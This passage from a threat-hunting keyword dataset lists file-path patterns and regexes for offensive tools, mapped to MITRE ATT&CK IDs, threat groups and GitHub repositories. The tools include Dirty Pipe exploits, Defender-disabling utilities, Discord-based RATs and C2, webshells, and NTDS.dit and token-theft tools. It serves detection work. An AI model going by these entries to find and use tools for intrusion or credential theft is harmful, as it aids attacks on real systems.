T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","6579" "*/dir_brute.txt*",".{0,1000}\/dir_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","6580" "*/dirbuster*",".{0,1000}\/dirbuster.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6581" "*/dirbuster.py*",".{0,1000}\/dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6582" "*/dirbuster/*",".{0,1000}\/dirbuster\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6583" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM 
for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","6584" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","6585" "*/dirdevil.git*",".{0,1000}\/dirdevil\.git.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6586" "*/dirdevil.ps1*",".{0,1000}\/dirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6587" "*/dirdevil_decoder_mini.ps1*",".{0,1000}\/dirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6588" "*/dirdevil_decoder_only.ps1*",".{0,1000}\/dirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory 
structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6589" "*/direct_syscall_amd64.s*",".{0,1000}\/direct_syscall_amd64\.s.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","6590" "*/dirsearch.py*",".{0,1000}\/dirsearch\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","6591" "*/DirtyCLR.git*",".{0,1000}\/DirtyCLR\.git.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","1","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","6592" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","N/A","3","280","78","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z","6593" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - 
TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","6594" "*/Dirty-Pipe/main/exploit-static*",".{0,1000}\/Dirty\-Pipe\/main\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","6595" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6596" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","6597" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","6598" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","6599" 
"*/dirtypipez-exploit/*",".{0,1000}\/dirtypipez\-exploit\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","6600" "*/Dirty-Vanity.git*",".{0,1000}\/Dirty\-Vanity\.git.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","6601" "*/dis_defender.exe*",".{0,1000}\/dis_defender\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6602" "*/Disable_defender.py*",".{0,1000}\/Disable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","6603" "*/disable-defender.exe*",".{0,1000}\/disable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6604" "*/Disable-TamperProtection.git*",".{0,1000}\/Disable\-TamperProtection\.git.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","6605" "*/DisableWD.dll,*",".{0,1000}\/DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6606" "*/Discord rat.exe*",".{0,1000}\/Discord\srat\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6607" "*/DiscordBot.py*",".{0,1000}\/DiscordBot\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","6608" "*/discord-c2.git*",".{0,1000}\/discord\-c2\.git.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","1","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","6609" "*/Discord-RAT-2.0*",".{0,1000}\/Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6610" "*/Discord-RAT-2.0.git*",".{0,1000}\/Discord\-RAT\-2\.0\.git.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6611" "*/disctopia.py*",".{0,1000}\/disctopia\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - 
TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6612" "*/disctopia-c2*",".{0,1000}\/disctopia\-c2.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6613" "*/DiskCryptor.git*",".{0,1000}\/DiskCryptor\.git.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6614" "*/dist/fw_walk.*",".{0,1000}\/dist\/fw_walk\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","6615" "*/dist:/dist_ext torat*",".{0,1000}\/dist\:\/dist_ext\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","#linux","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","6616" "*/distcc-cve2004-2687.nse*",".{0,1000}\/distcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6617" "*/distopia-test*",".{0,1000}\/distopia\-test.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6618" "*/DitExplorer.git*",".{0,1000}\/DitExplorer\.git.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6619" "*/DitExplorer/releases/download/*",".{0,1000}\/DitExplorer\/releases\/download\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6620" "*/DitExplorer/releases/tag/v*",".{0,1000}\/DitExplorer\/releases\/tag\/v.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6621" "*/DitExplorer/tarball/*",".{0,1000}\/DitExplorer\/tarball\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing 
NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6622" "*/DitExplorer/zipball/*",".{0,1000}\/DitExplorer\/zipball\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6623" "*/Dive Shell 1.0 - Emperor Hacking Team.php*",".{0,1000}\/Dive\sShell\s1\.0\s\-\sEmperor\sHacking\sTeam\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6624" "*/DKMC.git*",".{0,1000}\/DKMC\.git.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","6625" "*/dkmc.py*",".{0,1000}\/dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","6626" "*/DLHell.git*",".{0,1000}\/DLHell\.git.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","6627" 
"*/DLHell.py*",".{0,1000}\/DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","6628" "*/dll/inject/*",".{0,1000}\/dll\/inject\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6629" "*/dll_inject.exe*",".{0,1000}\/dll_inject\.exe.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6630" "*/DLLEnc.ps1*",".{0,1000}\/DLLEnc\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","6631" "*/dllexploit.cpp*",".{0,1000}\/dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","6632" "*/dllexploit.exe*",".{0,1000}\/dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","6633" "*/DllExport.bat*",".{0,1000}\/DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","6634" "*/DLL-Hijack*",".{0,1000}\/DLL\-Hijack.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil 
- RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","6635" "*/dll-hijack-by-proxying.git*",".{0,1000}\/dll\-hijack\-by\-proxying\.git.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","6636" "*/DLLHijackTest.git*",".{0,1000}\/DLLHijackTest\.git.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - 